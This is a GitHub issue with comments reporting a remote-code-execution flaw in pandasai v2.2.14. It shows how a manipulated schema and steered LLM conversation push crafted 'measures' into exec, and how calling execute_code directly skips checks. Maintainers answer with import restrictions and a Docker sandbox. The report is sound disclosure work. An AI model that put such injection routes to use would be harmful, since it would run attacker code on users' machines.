SemanticAgent can trigger RCE through conversation #1367
Comments
Hi @BACMiao! I'm here to help you with any bugs, questions, or contributions you have. The
To mitigate this risk, it is crucial to implement proper input validation and sanitization in the
The first PoC is not triggered through the
Hey @dosu bot, it looks like this issue got fixed with some import restrictions that were put in place in the latest code. Can you confirm that? Is it still possible to cause RCE after these changes?
Yes, the latest code changes in the
These changes collectively enhance the security of the
Hey @sei-vsarvepalli, 3.0's main security feature is the possibility of executing the code in a sandbox: you can check it out here (https://docs.getpanda.ai/v3/privacy-security). Also, the core library now has a semantic data layer for both semantic enhancement (https://docs.getpanda.ai/v3/semantic-layer) and data transformations (https://docs.getpanda.ai/v3/transformations).
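A minimal sketch of that sandbox pattern, assuming the `DockerSandbox` API described in the linked v3 docs (the `pandasai_docker` package name, the `sandbox=` keyword, and the `pai.chat` signature are assumptions, not taken from this issue):

```python
# Sketch only: package name, class, and chat() signature are assumptions
# based on the pandasai v3 docs (https://docs.getpanda.ai/v3/privacy-security).
import pandasai as pai
from pandasai_docker import DockerSandbox

# Start an isolated Docker container that will run the generated code
sandbox = DockerSandbox()
sandbox.start()

df = pai.DataFrame({"country": ["USA", "UK"], "revenue": [5000, 3200]})

# Any code produced by the LLM runs inside the sandbox, so an injected
# exec() payload cannot touch the host filesystem.
response = pai.chat("Which country has the highest revenue?", df, sandbox=sandbox)
print(response)

# Stop the container when finished
sandbox.stop()
```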
System Info
OS version: macOS 14.3.1
Python version: Python 3.12.4
The current version of pandasai being used: v2.2.14
🐛 Describe the bug
Hi, Team
While using the `SemanticAgent`, I discovered that users can bypass the existing security checks by manipulating the provided `schema` and forcing the system to return specific `measures` values during conversations with the LLM, potentially triggering the execution of risky code through `exec`.
PoC: (from the example code)
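For context, a minimal sketch of how a `SemanticAgent` is typically set up with a user-supplied schema in pandasai v2.x; the schema keys and the `schema=` parameter are assumptions, and this is not the reporter's original PoC:

```python
# Illustrative sketch only -- not the original PoC. The schema layout and the
# schema= parameter are assumptions based on the pandasai v2.x SemanticAgent docs.
import pandas as pd
from pandasai.llm import OpenAI
from pandasai.ee.agents.semantic_agent import SemanticAgent

df = pd.DataFrame({"country": ["USA", "UK"], "revenue": [5000, 3200]})

# User-controlled schema: the expressions declared in `measures` flow into the
# code that the agent later generates and runs through exec().
schema = [
    {
        "name": "Sales",
        "table": "sales",
        "measures": [
            {"name": "total_revenue", "type": "sum", "sql": "revenue"},
        ],
        "dimensions": [
            {"name": "country", "type": "string", "sql": "country"},
        ],
    }
]

agent = SemanticAgent(
    df,
    config={"llm": OpenAI(api_token="YOUR_API_KEY")},
    schema=schema,
)

# A crafted conversation can steer the LLM into emitting a "measure" whose
# expression contains arbitrary Python, which is then executed via exec().
agent.chat("Show total revenue per country")
```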
Log:
![image](https://private-user-images.githubusercontent.com/15136865/369874528-b199dc5b-be6e-4fc4-8e5a-42743c1c0cbd.png)
Arbitrary instructions can be executed through the generated code (e.g., reading file contents).
This is the log information printed in pandasai.log:
![image](https://private-user-images.githubusercontent.com/15136865/370110562-6e6a7f91-946f-485c-88b0-b1afeb2def91.png)
Additionally, I found that directly using the `execute_code` method from the `BaseAgent` can also bypass some security checks.
PoC:
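As an illustration of this second vector (again not the reporter's original PoC; whether `execute_code` accepts a raw code string like this is an assumption based on the report), a sketch of invoking the method directly with attacker-chosen code:

```python
# Illustrative sketch only -- not the original PoC. Passing a raw code string
# to execute_code() is an assumption based on the report.
import pandas as pd
from pandasai import Agent
from pandasai.llm import OpenAI

df = pd.DataFrame({"country": ["USA", "UK"], "revenue": [5000, 3200]})
agent = Agent(df, config={"llm": OpenAI(api_token="YOUR_API_KEY")})

# Code handed straight to execute_code() skips the prompt-level checks that
# normally run on LLM-generated code before it reaches exec().
malicious_code = "result = {'type': 'string', 'value': open('/etc/hosts').read()}"
agent.execute_code(malicious_code)
```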